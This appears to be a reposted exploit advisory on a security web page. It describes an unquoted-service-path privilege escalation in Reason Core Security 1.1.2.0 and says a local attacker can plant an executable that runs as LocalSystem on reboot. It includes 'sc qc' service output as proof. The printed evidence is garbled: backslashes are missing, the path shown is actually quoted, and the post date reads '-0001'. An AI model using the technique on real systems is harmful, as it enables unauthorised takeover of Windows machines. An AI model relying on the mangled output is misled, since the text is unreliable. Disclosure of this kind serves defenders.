Home / os / win10

Reason Core Security Unquoted Service Path Privilege

Posted on 30 November -0001

<HTML><HEAD><TITLE>Reason Core Security Unquoted Service Path Privilege</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>######################################################################### # Exploit Title: Reason Core Security Unquoted Service Path Privilege Escalation # Date: 12/23/2016 # Author: Saeed Hasanzadeh (Net.Hun73r) # Vendor Homepage: https://www.reasoncoresecurity.com/ # Software Link: http://cdn.reasonsecurity.com/resources/installers/reason-core-security-setup.exe #version : 1.1.2.0 # Tested on: Windows 7 ########################################################################## Reason Core Security installs a service with an unquoted service path To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. ------------------------------------------- C:>sc qc rsEngineSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: rsEngineSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:Program FilesReasonSecurity sEngineSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Reason Core Security Engine Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem</BODY></HTML>

 

TOP